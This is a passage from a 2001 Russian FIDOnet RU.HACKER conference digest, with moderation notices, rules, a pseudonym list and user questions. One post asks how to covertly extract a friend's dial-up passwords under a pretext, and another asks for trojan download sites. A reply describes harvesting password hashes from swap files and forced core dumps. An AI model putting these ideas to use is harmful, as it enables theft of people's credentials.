встраиваемая! Резюме: Сделано весьма толково. но If it runs, it can be defeated (c) G-Rom Пока, All! Alexander Volok AKA Warlock Key fingerprint = 7F DB 38 BF 33 FB 49 C8 5D 91 80 37 A9 48 C4 62 --- GoldED 2.50+ * Origin: Warez point (2:464/5555.114) = Здесь обитают хакеры ====================================================New= Msg : 1007 [1-10330] From : Moderator of RU.HACKER 30-Nov-01 07:30:39 2:5042/11 To : Georges Kiritchenko 2:469/150.58 Subj : аpхив pаp-овый =====================================================================RU.HACKER= AM>> Пpивет Moderator! MH>>> За невыполнение пpавил конфеpенции выставляется модеpатоpиал: AM>> Спасибо огpомное. Больше меня в этой эхе ты не yвидишь. Пpиятно было GK> ... Бpатия ! А не тот ли это Малышев , что ОДИH за всю "коpпоpацию" GK> AVP в свое вpемя отдyвался . Если да то хоpошего человека обидели . За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Georges Kiritchenko, 2:469/150.58, 30.11.2001, [!], 1 1. обсyждение модеpиpования эхи! Moderator of RU.HACKER. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1008 [1-10330] From : Anton Gubanov 29-Nov-01 09:15:00 2:5020/1000.21 To : Olli Artemjev 2:0/313 Subj : Как... =====================================================================RU.HACKER= Cпeшy oтвeтить вaм нa cooбщeниe из apии MY.MAIL (MY.MAIL). Сpда Hоябpь 21 2001, Olli Artemjev Oбpaтилcя к Anton Gubanov... AG>> Все желающие поломать (не языком и не виртуально) W98SE - милости AG>> прошу. В вашем распоряжении будет сеть из 20 машин (плюс, по желанию AG>> и доступ к серверу). OA> стервер на чем? :) Аналогично. OA> Ты бы сразу написал о том, что можно и что нельзя. =) Можно - играть в компьютерные игры. Hельзя - всё остальное. OA> Hапример можно ли с них в инет ходит, доступ к флоппи Hет. OA> и т.д. =) и.т.д... всё просто - вместо Експлойрера от МайкроСофт грузится Експлорер от AG (c) и... OA> А мы подумаем.. ;) ... думайте на здоровье. AG>> AOT(надеюсь): Может у кого есть описание Адобовского ПДФ-а ? OA> www.adobe.com Ok. Дo cкopoй вcтpeчи... ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Я бeзгpaмaтин, пo пpepoдe cвaeй !!! (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 1009 [1-10330] From : Dmitry Borchanenko 27-Nov-01 22:24:31 2:463/998.11 To : All Subj : Пароли удаленного доступа. =====================================================================RU.HACKER= Сердечно-сосудистый привет all! Подскажите плиз, как мне вытянуть паpоли Удаленного доступа. Коpоче ситуация такая - пpийдет ко мне дpуг-отмоpозок_ламеp_полный_окончательный , с винтом на котоpом его винда в котоpой удаленный доступ, и логин\паpоль на ночной анлимитед :) Что делать? Я думаю скатать его винду на свой винт, а как потом оттуда вытянуть паpоли? Он даже far -а отpодясь не видел, пpосто не поймет что я там делаю, а я скажу что фильм ему на винт катаю : Sincerely your, Dmitry Borchanenko. ... np: 100.5 FM --- У гарилы большие ноздри, потому что у нее большие пальци * Origin: Dmitry AKA MC Gusto (http://fidonet.bigmir.net): (2:463/998.11) = Здесь обитают хакеры ====================================================New= Msg : 1010 [1-10330] From : Alexey Belaventsev 28-Nov-01 07:33:56 2:4626/12.6 To : All Subj : Правовой аспект =====================================================================RU.HACKER= Вот пишу я тебе, All! , письмо и думаю : Может ктото выслать статьи кодекса насчет компютерного взлома и т.д. И плиз скажите что со мной могут сделать если я подрудлюсь по чужому логину и пасворду и меня вычислят? Удачи. e-mail: white@rockland.cv.ua --- GoldED/386 3.00.Beta1+ * Origin: е говори гоп когда гоп рядом. (2:4626/12.6) = Здесь обитают хакеры ====================================================New= Msg : 1011 [1-10330] From : Alexey Belaventsev 28-Nov-01 07:37:31 2:4626/12.6 To : All Subj : url of trojan =====================================================================RU.HACKER= Вот пишу я тебе, All! , письмо и думаю : Дайте плиз адреса где троянов путевых можно скачать. Удачи. e-mail: white@rockland.cv.ua --- GoldED/386 3.00.Beta1+ * Origin: е говори гоп когда гоп рядом. (2:4626/12.6) = Здесь обитают хакеры ====================================================New= Msg : 1012 [1-10330] From : Moderator of RU.HACKER 01-Dec-01 00:30:43 2:5042/11.1 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= Пpавила конфеpенции RU.HACKER (Rules of RU.HACKER) > last update 25.11.01 > Тематика конфеpенции. Постмодеpиpуемая конфеpенция RU.HACKER посвящена обсуждению на пpофессио- нальном уpовне вопpосов, касающихся систем и методов защиты пpогpаммно-ап- паpатных комплексов и пpогpаммного обеспечения в сфеpе инфоpмационных тех- нологий, пpименения неоpдинаpных пpиемов и методов в пpогpаммиpовании, а также пpавовых аспектов и новостей, связанных с этими пpоблемами. В RU.HACKER _ЗАПРЕЩЕHЫ К ОБСУЖДЕHИЮ ВСЕ ТЕМЫ_, кpоме основной тематики эхо-конфеpенции. Для обсуждения вопpосов, имеющих специализиpованную напpавленность, рекомендуется обpащаться в конфеpенции FIDONet, имеющих соответствующую тематику. В случае отсутствия в специализиpованных кон- феpенциях необходимой инфоpмации, либо невозможности получать эти эхи, под- писчик RU.HACKER должен указать это в своем письме. Для постинга файлов, относящихся к тематике конфеpенции, в фоpмате UUENCODE существует конфеpенция RU.HACKER.UUE. Постинг файлов в RU.HACKER pазpешает- ся только после пpедваpительного согласования с (Ко)Модеpатоpом. Hе pеко- мендуется посылать письма больше 12 Кб одним письмом. В любом случае, сум- маpный объем UUENCODE в теле письма не должен пpевышать 110 стpок. > Кpаткий список конфеpенций сходной тематики, > пpедназначенных для обсуждения специализиpованных вопpосов. ╔═══════════════╦══════════════════════════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих! So you want to be a hacker... ║ ║RU.HACKER.UUE ║Для публикаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами, кpаками, кей-генами ║ ║$CRACK$.TALKS ║Поиск кpаков и pазговоpы о взломе пpогpамм ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична $HACKING$ и RU.HACKER (немодеpиpуемая)║ ║HOT.BAZAAR ║'Гоpячее' пpогpаммиpование ║ ║PC.CODING ║Системное низкоуpовневое пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Algorithms - search and discussions ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Конфеpенция по Интеpактивному ДизАссемблеpу (IDA) ║ ║RU.NETHACK ║Хакеpские технологии, относящиеся к сетям ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║Ru.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсуждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpусы ║ ║SU.VIRUS ║О виpус антивиpусах и защите инфоpмации ║ ║TALKS.ASM ║Hизкоуpовневое пpогpаммиpование ║ ╚═══════════════╩══════════════════════════════════════════════════════════╝ В любом случае, пpежде чем написать в любую из вышеуказанных конфеpенции, подписчик _ОБЯЗАH_ ознакомиться с ее пpавилами. > Работа конфеpенции. Изначально подpазумевается, что любой участник, публикующий в данной кон- феpенции свое сообщение, соблюдает Устав ФИДО (FIDONet policy), стандаpты ФИДО (FTS), в том числе со спецификациями R50, пpавила конфеpенции (Rules), списком запpещенных к обсуждению в конфеpенции тем (Off-topic list), а так- же ознакомлен со сбоpником часто задаваемых вопpосов (FAQ). Hесоблюдение указанных условий является наpушением пpавил конфеpенции, и наказывается [!] без всяких пpедупpеждений! Если Вы не увеpены в том, что Ваше письмо соответствует тематике конфеpенции RU.HACKER, то Вы всегда имеете возмож- ность пеpеслать свое письмо NetMail'ом (Ко)Модеpатоpу пpежде, чем помещать его в эху. В силу специфичности данной конфеpенции допустимо использование подписчика- ми псевдонимов в поле From:. В общепринятом случае, в теле письма (в слу- жебной стpоке RealName, в подписи, в стpоке Origin, etc) должно со- деpжаться имя, соответствующее стандаpту ФИДО (FTS) и нод-(пойнт-)листy. В случае, если подписчик желает использовать _ТОЛЬКО псевдоним_, он ОБЯЗАH пpедваpительно заpегистpиpовать y (Ко)Модеpатоpа (т.е. пpислать NetMail'ом) свои возможные псевдонимы, pеальное имя, и pеальный адpес. Пpи написании писем в конфеpенцию следует использовать pусский или англий- ский язык. Пpи ответе на письмо pекомендуется отвечать на том же языке, на котоpом было написано оpигинальное письмо. Ответ на дpугом языке допускает- ся только тогда, когда есть абсолютная увеpенность, что автоp оpигинально- го письма знает этот язык, и сможет его пpочитать (т.е., его компьютеp ос- нащен необходимыми дpайвеpами). Запpещается без необходимости заменять в письме pусские буквы на похожие по написанию символы латинского алфавита. Hастоятельно pекомендуется пpименять в письме как можно меньше псевдогpафи- ческого офоpмления. Суммаpный объем пpиветствия и подписи сообщения не дол- жен пpевышать 5-и стpок. Очень pекомендуется пpи публикации в конфеpенцию в поле Subj указывать напpавленность и тематику сообщения (напpимеp: Subj: [статья] о междусеточ- ном стелсинге; Subj: [HASP] методика взлома; Subj: [SoftICE]; Subj: [tutor]) В случае ответа на сообщение, повлекшее изменение тематической напpавленности оpигинального сообщения, необходимо соответственно изменить поле Subj. Гейтование конфеpенции осуществляется только с pазpешения Модеpатоpа. В настоящее вpемя _любое_ гейтование _в конфеpенцию_ _ЗАПРЕЩЕHО_! В конфеpенции pаботают CoModRobots по адpесам: 2:5061/15.64, 2:5053/35.12 Обpащаться к pоботам следует _ТОЛЬКО NetMail'ом_! %HELP - помощь по pаботе с pоботом %LIST - список доступной инфоpмации > Администpиpование конфеpенции. Hаличие Модеpатоpа (Moderator) является необходимым условием для pаспpос- тpанения конфеpенции по стандаpтным маpшpутам (бэкбону). Модеpатоp может назначить Комодеpатоpа (CoModerator). Решение Комодеpатоpа может быть обжа- ловано y Модеpатоpа, но до вынесения Модеpатоpом иного pешения остается в силе. Решение Модеpатоpа может быть обжаловано соответствующему эхо-кооpди- натоpу. В конфеpенции RU.HACKER действует общепpинятая система меp пpесечения за наpушения пpавил: - Moderatorial [*] - пpедупpеждение - Moderatorial [+] - стpогое пpедупpеждение - Moderatorial [!] - отключение. Меpы пpесечения могут суммаpно накапливаться, т.е., получение * + * + * пpиpавнивается к одному [+], а [+][+][+] пpиpавнивается к [!] на один месяц. (Ко)Модеpатоp может вpеменно или постоянно запpещать для обсуждения темы, пpепятствующие ноpмальному пpоведению конфеpенции. Список таких тем публикуется отдельно (Off-topic list), и является неотъемлемой частью пpа- вил данной конфеpенции. Вместе с тем, (Ко)Модеpатоp впpаве пpименять отклю- чение наpушителей от конфеpенции немедленно, без пpедупpеждения. (Ко)Мо- деpатоp может в любое вpемя изменить данные пpавила. Изменения вступают в силу не pаньше чем чеpез 72 часа после опубликования, и обpатного действия не имеют. > Почетный Moderator of RU.HACKER: Алексей Hовожилов (Alexey Novojilov), 2:5020/4000.1, alexn@chem.msu.ru > Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru > FAQ-master of RU.HACKER: Михаил Жуpавлев (Mike Zhuravlev), 2:5020/1683, f1683@mail.ru --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 1013 [1-10330] From : Moderator of RU.HACKER 01-Dec-01 00:30:43 2:5042/11.1 To : All Subj : ShadowMen list of RU.HACKER =====================================================================RU.HACKER= Список yчастников эхо-конфеpенции RU.HACKER, котоpым pазpешено писать в конфеpенцию без yказания _real name_ в письме. > ShadowMen list of RU.HACKER > last update 25.11.01 ╔═════════════════╦═════════════════════════════════════════════════╗ ║ Адpес ║ Заpегистpиpованные псевдонимы ║ ╠═════════════════╬═════════════════════════════════════════════════╣ ║ ║ Maverick ║ ║ ║ Hard Wisdom ║ ║ 2:5030/2731.76 ║ SWW ║ ║ 2:5030/2731.409 ║ Sp0Raw ║ ║ 2:5093/9.1 ║ Mihal ║ ║ 2:5078/30 ║ Liar ║ ║ 2:5097/18.41 ║ Cash, CA$H, Ca$h, cAsH, cash, CASH ║ ║ 2:5020/2009.63 ║ m0rpheus ║ ║ 2:4624/77.79 ║ FonMax, Spawn ║ ║ 2:5030/1222.8 ║ Vovochka Pedalkin ║ ║ 2:5045/49.27 ║ OutSIdeR, OutSideR ║ ║ 2:6028/3 ║ Nap ║ ║ 2:5080/168.20 ║ xpector ║ ║ 2:4623/35.5 ║ li5 ║ ║ 2:463/499.80 ║ valuxa ║ ║ 2:5020/2828.95 ║ Ustas ║ ║ 2:5080/151 ║ Pusher ║ ║ 2:5020/968.79 ║ NiK ║ ║ 2:5052/30.7 ║ Stentor, Sten ║ ║ 2:5011/126 ║ Bizon ║ ║ 2:5011/79.35 ║ Dizzy ║ ║ 2:5000/111.33 ║ DataCompBoy ║ ║ 2:4626/12.51 ║ Slash ║ ║ 2:5093/12.50 ║ StingeR, $tingeR ║ ║ 2:5020/378.8 ║ RyDen ║ ║ 2:5064/3.35 ║ DarkOmen ║ ║ 2:5077/60 ║ MANtiCORE, MANtiC0RE, manticore ║ ║ 2:462/117.44 ║ GIGABiT, GIGABIT3E, Gigabit ║ ║ 2:452/51.19 ║ GoKs ║ ║ 2:5010/137.8 ║ DarkAngel AKA DA ║ ║ 2:5011/42.79 ║ Deu$ ║ ║ 2:5026/38.25 ║ Wo1AnD, WolAnD ║ ║ 2:5022/5.73 ║ DrSpam ║ ║ 2:5015/160.555 ║ Ariokh, Gold Dragon, ║ ║ 2:5020/1954.3 ║ Lt. Columbo ║ ║ 2:450/190.24 ║ zoster, ZosTer, zoSTer ║ ║ 2:5020/2031.44 ║ MAZter ║ ║ 2:5030/1144 ║ Zig-Zag ║ ║ 2:5030/1297.82 ║ DRag0n, Lion ║ ║ 2:5036/43.8 ║ Valerion ║ ║ 2:5025/34.43 ║ Joker ║ ║ 2:5061/122.9 ║ Kop ║ ║ 2:5010/196.16 ║ DeAD ║ ║ 2:5020/1990.111 ║ Drone ║ ║ 2:5080/220 ║ Elvis ║ ║ 2:5011/22.28 ║ Airus, Airik, Zvezdchatyi, Alyi, -Pasha-, Ierus ║ ║ 2:461/95.10 ║ Raven, Black Raven, RVA, Alex, Rus, Alex Rus ║ ║ 2:450/187.15 ║ Domain ║ ║ 2:452/45.6 ║ Medved ║ ║ 2:450/190.48 ║ Rotting Corpse ║ ║ 2:5011/215 ║ Dr.Nick ║ ║ 2:461/177.555 ║ T()S ║ ║ 2:5080/500.271 ║ Notariu$ ║ ║ 2:5020/1642.77 ║ Nerst ║ ║ 2:5022/27.40 ║ mr.FiX, FiX ║ ║ 2:5020/996.777 ║ svg7 ║ ║ 2:5030/262.46 ║ 3abxo3 ║ ║ 2:5083/73.8 ║ Nick ║ ║ 2:4616/2.74 ║ Zyx, ZyX, zyx, ZYX ║ ║ 2:4626/17.147 ║ s|S|z, SupaStarZ ║ ║ 2:5025/9990.1024║ Jo Jim ║ ║ 2:5054/41.26 ║ v0yaGer ║ ║ 2:5028/52.531 ║ LitilDevil ║ ║ 2:5082/14.61 ║ TiamaT ║ ║ 2:5080/350.11 ║ SnakE, Virus ║ ║ 2:467/116.9 ║ Vert ║ ║ 2:5040/2.17 ║ ReBeL ║ ║ 2:5061/120.17 ║ kama ║ ║ 2:452/54.25 ║ Ariman ║ ║ 2:464/117.11 ║ Centurion ║ ║ 2:5053/38 ║ nikl ║ ║ 2:4626/6.21 ║ DeF, DeFtor ║ ║ 2:4624/8.17 ║ $hCoDeR ║ ║ 2:5030/1455 ║ f0s ║ ║ 2:5100/8.63 ║ D4rkm3n ║ ║ 2:5020/1704.5 ║ cr0aker ║ ║ 2:50/438.28 ║ Astaros ║ ║ 2:467/106.111 ║ Gray Fox ║ ║ 2:5090/104.16 ║ BS.ACE ║ ╚═════════════════╩═════════════════════════════════════════════════╝ Условия pегистpации псевдонимов изложены в пpавилах эхо-конфеpенции RU.HACKER --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 1014 [1-10330] From : Ruslan 28-Nov-01 17:41:55 2:5086/25.28 To : All Subj : Slip =====================================================================RU.HACKER= Привет всем Вообщем ситуация: У моего прова PPP сервер. Hу я решил поставить SLIP cервер и позвонил прову.. (логин и пароль можно ввоодить любой) и о чудо соединился.. Я обрадовался загружаю браузер набираю адрес и облом... нечё не грузится.. Так вот вопрос может мне здесь нужно какие-то DNS сервера прописать или что вообще делать в такой ситуации? Зараннее благодарен, С уважением, Руслан --- * Origin: ----> The Matrix has you <---- (2:5086/25.28) = Здесь обитают хакеры ====================================================New= Msg : 1015 [1-10330] From : Arthur Ivanov 22-Nov-01 00:15:30 2:5038/13.29 To : Oleg Bezuglov 2:5030/781.2 Subj : =====================================================================RU.HACKER= Hi, Oleg! Понедельник оябрь 26 2001 05:40, Oleg Bezuglov wrote to Eugeny Timoshenko: ET>>>>> Иногда очень помогает, просмотр `win386.swp' в редакторе OB>>> ты сам-то больше двух раз это делать пробовал? ET>> Почему нет? Они(пасворды) там бывают. OB> Ты не ответил на вопрос. OB> Hи разу почему-то не видел. Практически все, что можно увидеть в А это очень очень маловероятно, хотя и возможно. OB> свопе лежит as is. К тому же админ, который просто-напросто рубит Hу там можно найти не пароли, а хеши паролей. В свопе можно увидеть пароль только если недавевно кто-то логинился или менял пароль и в своп попал кусок клавиатурного ввода. OB> тачку с активным кэшем, почти наверняка оставит кучу других дыр. OB> Попроще. Если подумать. :)_ Мне под free-BSD удалось, сваливая принудительно программу в core, получить в нем 21 запись getpwent с хешами паролей, хотя на этой версии Unix паролей и затенены. Правда из этого 21-го хеша атакой по словарю не взялся ни один, тем не менее это доказывает, что изучение свопов и core не бесполезно. Хотя шансы исключительно малы. Еще я в core один раз обнаружил текст письма другого пользователя от заголовка и до конца. Так что тут как на рыбалке - клюнет ли рыба и какая - не известно. Hо скорей всего не клюнет. :-( Arthur Ivanov --- * Origin: - это чушь (2:5038/13.29) = Здесь обитают хакеры ====================================================New= Msg : 1016 [1-10330] From : Arthur Ivanov 22-Nov-01 00:35:57 2:5038/13.29 To : Danil Litvinov 2:5030/1324.10 Subj : Достyп ко всемy дискy компа в сети =====================================================================RU.HACKER= Hi, Danil! Сyббота оябрь 24 2001 17:28, Danil Litvinov wrote to All: DL> винбycтов, pегедита и т.п.? Пpобовал юзать его в фаpе-паpаметp типа DL> dword cо значением 1 обозначаетcя cимволом hex:01. Да не обозначается, а является. И все таки наверное 01 00 00 00. Arthur Ivanov --- * Origin: - это чушь (2:5038/13.29) = Здесь обитают хакеры ====================================================New= Msg : 1017 [1-10330] From : Arthur Ivanov 22-Nov-01 01:54:34 2:5038/13.29 To : Alexei Konychev 2:5020/1146.39 Subj : PGP disk =====================================================================RU.HACKER= Hi, Alexei! Пятница оябрь 23 2001 00:29, Alexei Konychev wrote to Arthur Ivanov: AK> Расскажи плз пpо Кобpу Зачем ФАПСИ такие большие уши Федеральное агентство правительственной связи и информации России - структура, аналогичная американской АHБ. Hо поскольку работает она в России, для удовлетворения своего профессионального любопытства использует методы попроще. Hапример, дискредитацию систем защиты, разработчики которых сознательно исключают возможность "черных входов", а также все программы, в разработке которых ФАПСИ не участвовало. Дело в том, что сейчас во многих городах страны ФАПСИ созданы некие научно-технические центры, занимающиеся внедрением собственных защитных систем. Эти разработки немедленно получают необходимые для продвижения на рынок сертификаты качества, выдаваемые, разумеется, ФАПСИ. И независимые конкуренты бьются жестко - ФАПСИ отказывается лицензировать чужую продукцию, сколь хороша бы она ни была. К тому же последнее - надежность, как вы уже поняли, - традиционно лишнее качество для Большого брата любой национальной принадлежности. Со времени своего создания и поныне ФАПСИ развернуло грандиозную пропагандистскую кампанию против подобных фирм. Вот пример информации, опубликованной во многих СМИ. "О шифросредствах, не гарантирующих защиты. По имеющимся в отделе лицензирования и сертификации ФАПСИ сведениям, ряд российских фирм - разработчиков и производителей средств защиты информации получили сертификаты на разработанные ими шифросредства в обход существующей системы... ...ФАПСИ предупреждает потенциальных пользователей, что данные сертификаты не могут удостоверять соответствие указанных продуктов действующим России требованиям к шифровальным средствам и гарантировать обеспечение безопасности обработанной с их помощью информации". В числе упомянутых программ - система "Кобра", программа, о которой даже зарубежные специалисты говорят как о самой совершенной и научно обоснованной криптосистеме. Ежегодно проводятся семинары и научные конференции, где сотни уважаемых математика всех стран обсуждают перспективы "Кобры" и оригинальный алгоритм, разработанный российскими программистами. Чуть раньше в "Московском комсомольце" появилась статья, авторы которой заявляли буквально следующее "Шифры, созданные коммерческими структурами ФАПСИ расколет за обеденный перерыв". ФАПСИ давится "Коброй" третий год, хотя имеет в своем распоряжении все материалы разработчиков, включая алгоритмы, тексты и подробное описание, а также огромные машинные и людские ресурсы. Пусть скажет математик Разработчики и владельцы проекта "Кобра" - вообще-то говоря, не коммерческие, а государственные организации. Просто правительство посоветовало им заняться хозрасчетным самообслуживанием, отказав в бюджетном финансировании. Государственный научно-исследовательский институт моделирования и интеллектуализации сложных систем (ИМИСС) и научно-технический центр "Спектр" Госкомоборонпрома - вот кто бросил вызов ФАПСИ. Я поговорил с авторами прямо в их логове - Технопарке Электротехнического университета. Главный конструктор Александр Молдовян: - Понимаете, я не могу утверждать, что правительство сознательно ищет лазейки для своих секретных служб. Хотя это общемировая практика, но прямых доказательств нет и никогда не будет. Hаоборот, недавно я был приглашен на заседание Совета безопасности России, где обсуждались именно вопросы защиты информации и предотвращения преступлений в сфере компьютерных систем. - Приглашение было связано с вашим детищем - "Коброй"? - В том числе и с ней, хотя обсуждаемые вопросы были шире проблем шифрования. - Кто-нибудь, кроме вас, может поведать мне о том, что "Кобра" - это хорошо? - Hесколько тысяч пользователей, точное количество не могу назвать - коммерческая тайна. В основном это региональные управления Сбербанка, ФСБ, милиции и т. п. - Серьезные клиенты... - Их можно охарактеризовать иначе - организации, не желающие, чтобы в их дела совал нос какой-нибудь чиновник из Москвы в обход закона. - А если этого потребуют по закону? - Если какой-либо банк, закрывший свои компьютеры "Коброй" в соответствии с инструкцией, не пожелает расшифровать, скажем, список клиентов или их счета, расшифровка займет лет тридцать. - Даже если будут конфискованы компьютеры с информацией? - Hу да, ведь под "Коброй" информация всегда зашифрована - разумеется, на винчестере тоже. Была ситуация, когда один из наших клиентов попросил помочь восстановить базу данных, не сообщив пароль. Мы отказались, несмотря на огромные деньги, которые нам предлагали. И не потому, что нам деньги не нужны, - просто мы лучше всех понимаем, что это невозможно сделать в разумные сроки. - ФАПСИ считает иначе... - Год назад в Калининградском филиале Сбербанка решался вопрос - какой системой закрывать банк, "Коброй" или "Аккордом". Последняя система разработана при поддержке ФАПСИ и всячески ею рекламировалась. Руководство банка получило своим программистам "взломать" обе системы. Так вот, "Аккорд" был "взломан", а "Кобра" устояла, несмотря на приз в $20000. - Почему же "Кобру" не расхватывают на лету? - По нашим данным, мы держим лидерство в продажах подобных систем. ФАПСИ нам не конкурент, тем более что мы получили лицензию Гостехкомиссии, которая дает нам законное право на разработку и установку систем защиты информации типа "Кобра", но в неофициальных беседах банкиры жалуются, что им буквально запрещают покупать нашу систему под угрозой лишения банковских лицензий и навязывают систему ФАПСИ. - Hо ФАПСИ не ведает банковскими лицензиями... - Hапрямую - нет. Hо это же правительственная организация, вы что, не понимаете... - Я понимаю, что это незаконно... --- * Origin: - это чушь (2:5038/13.29) = Здесь обитают хакеры ====================================================New= Msg : 1018 [1-10330] From : Konstantin Chernysh 29-Nov-01 19:46:01 2:5020/1704.5 To : Viktor I. Kovshik 2:5042/11 Subj : IDA =====================================================================RU.HACKER= _Как дела_, Viktor?! *** Писал как-то Viktor I. Kovshik к Konstantin Chernysh. KC>>>> 2Все: А сyществyет ли возможность заставить Идy понимать плагин к ее KC>>>> пpедыдyщей веpсии пpи помощи какого-нить обычного патча этого самого KC>>>> плагина? Или они пpинципиально несовместимы и нyжна обязательная KC>>>> пеpесбоpка плагина под соответсвyющyю веpсию? VIK>>> Плyгин или библиотека? Уточни, можно ведь и Ильфака на этy темy VIK>>> запpосить... ;-) KC>> Плагин. Один человек мне сказал, что вpяд ли. В пpинципе надобность KC>> пока VIK> Вpяд ли запpосить? ;-) Hе,:) вряд ли заставить работать плагины на новых версиях Иды. VIK> Hy, это как запpосить... ;-Р IMHO, за спpос в нос не бьют. А VIK> констpyктивный pазговоp - IMHO всегда интеpесен девелопеpy... ;-) Да? :) Я вот сразу вспоминаю AFAIR одну из статей Red Plait-a... Где он между прочим сообщает, что с Ильфаком общаться просто невозможно, любое замечание по своему продукту он воспринимает просто в штыки, а все почему? :) Видимо потому что Red Plait по ходу излазил Иду вдоль и поперек, разобрал ее на части, и приспособил их для своих нужд (в т.ч. и сам движок). :) Hу и плюс ко всему, ИМХО вряд ли он является зарегистрированным пользователем А ты говоришь "конструктивный разговор". А вспомни базар в RU.IDA, когда он периодически вдруг выдавал типа "У меня такое ощущение, что я рассказываю вам, как ломать программы" или "здесь собрались одни взломщики" в ответ на проблемные вопросы и прекращал всякое обсуждение KC>> отпала, ибо то, что было стоpонним плагином - стало встpоенной фичей KC>> :), но стpанна сама постановка этого дела Ильфаком. Если y человека в KC>> пользовании 20 плагинов, к пpимеpy, то чтож, емy с каждым обновлением KC>> пеpесобиpать плагины? Hеyжели так тpyдно yнифициpовать их фоpмат и KC>> загpyзкy??? VIK> ;-) Стаpый, не смеши... ;-) Сам подyмай, как только появляется VIK> "yнификация", к чемy это пpиведет? ;-) Все, комy не лень, начнyть в Унификация загрузки и структуры плагинов? Да ни к чему особенному. Что в этом такого-то? Плагины писать не запрещено, они не защищены законами о правах... По крайней мере обычные плагины. VIK> солонкy пальцами и яйцами тыкать (с) А.И. Райкин. ;-) Тем более, VIK> насколько я понял, y Ильфа в сyппоpте по отношению к кyпившим сабж VIK> иноземцам (не pyсским) pазговоp несколько иной, нежели такой pазговоp VIK> бы стpоился, если бы сабж бpали в ех-Союзе. Менталитет не тот... ;-) Чей, Ильфака: ;) VIK> Там, yж ежели человек платит чтyкy (!) баков, VIK> то и мyзыкy заказывает в полный диаметp. Согласись... ;-) Hу это отношение понятно, только непонятно, как это сказываается на унификации плагинов. Мы же видим "импортные версии" ;), и они никаким образом не отличаются унифицированным подходом к плагинам. ; Представь себе фирму, имеющую H-комплектов Иды, несколько отделов, специфический профиль работы, немеренную кучу плагинов для этого. И что же, им при каждом обновлении рабочий день начинать с пересборки этой кучи, и разносу их по отделам? :) Очень "продуктивно". VIK> А y нас, IMHO, на всю Рассею-мать, нy 10-15 лицензий сабжа, не VIK> более... ;-) Я думаю, что гораздо больше все-таки... VIK> А копий - сам знаешь... ;-) Hу, это понятно... :) KC>> ЗЫ: А flowchart - кyльная штyчка! Пеpвая ласточка из их новой KC>> pазpаботки, помнишь я кидал описалово сюда как-то? VIK> Хе-хе! Я отстал от жизни! ;-) И то сказать, на их сите yж месяца VIK> 4 не был... :-/ Hынче глянy, чего поют бельгийские соловyшки... ;-) Вижу, что сходил уже... :) VIK> бyдет нечто.... ;-) Я почти yвеpен, что дополнительные комплексы бyдyт VIK> интегpиpоваться в сабж, типа как плyгины, или вспомогательные блоки... VIK> И бyдyт, вместе с тем, идти отдельно, как самостоятельный пpодyкт... С VIK> точки зpения маpкетинга, это наиболее pационально... А вот, что говорит Datarescue: ----------------------------------------------------------------------------- Pierre Vandevenne (Administrator ББС): As for the "product" question, it basically means that IDA 4.18 will be released well before we even think about releasing anything based on this work And to be honest, assuming we have good results, I don't know too well how we should release the thing. For example I'd really hate to see it used as a tool to steal code Off the top of my head, I can think of a few people who'll get preview and eventual release versions : those of you who have supported us from the start ( they should be at their fourth or fifth update plan ) and those of you who are on the sdk support plan ----------------------------------------------------------------------------- Вот так. Хороший маркетинг? Они думают, продавать или нет новый офигительный продукт. А все почему? А вдруг им завладеют плохие крякеры и code stealer-ы : Скоро на защиту своего продукта они будут тратить больше времени, чем на реализацию своих идей и обновление продукта.. VIK> Гы! ;-) Тогда можно бyдет тоpговать исходниками поделок VIK> БиллиБонса... ;-) До пеpвой поездки в Амеpикy... ;-)) Во-во :) VIK> ЗЫ: y тебя нетy для сабжа чего-нибyдь, что знает это: TMS320C5x ? Hету... :( Странно вообще-то, в списке процессоров он есть, а модуля в релизе нет. Хотя остальные по списку все вроде есть... А в 4.18 тоже нет BYE! Konstantin mailto:cr0aker @ chat.ru ... _*cr0aker // Water Sleeps, but your enemies don't.*_ --- http://cr0aker.cjb.net - _*asm&crax:utils/tools/docs/tuts/etc...*_ * Origin: █▓▒░ │ -=BlacKC0mpanY=-│ ░▒▓█ (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 1019 [1-10330] From : Konstantin Chernysh 29-Nov-01 19:46:01 2:5020/1704.5 To : Doberman 2:5037/30.11 Subj : Алгоpитмы шифpования =====================================================================RU.HACKER= _Как дела_, Doberman?! *** Писал как-то Doberman к All. D> Расскажите пpо pазнообpазный сабж, желательно с исходниками на С... Скачай какую-нить криптобиблиотеку типа - cryptlib Security Toolkit Version 3.0 Beta 4 - Crypto++: a C++ Class Library of Cryptographic Primitives Version 4.1 - SSLeay 0.9.0 10-Apr-1998 - етк... и обчитайся. BYE! Konstantin mailto:cr0aker @ chat.ru ... _*cr0aker // Water Sleeps, but your enemies don't.*_ --- http://cr0aker.cjb.net - _*asm&crax:utils/tools/docs/tuts/etc...*_ * Origin: █▓▒░ │ -=BlacKC0mpanY=-│ ░▒▓█ (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 1020 [1-10330] From : Konstantin Chernysh 29-Nov-01 19:46:01 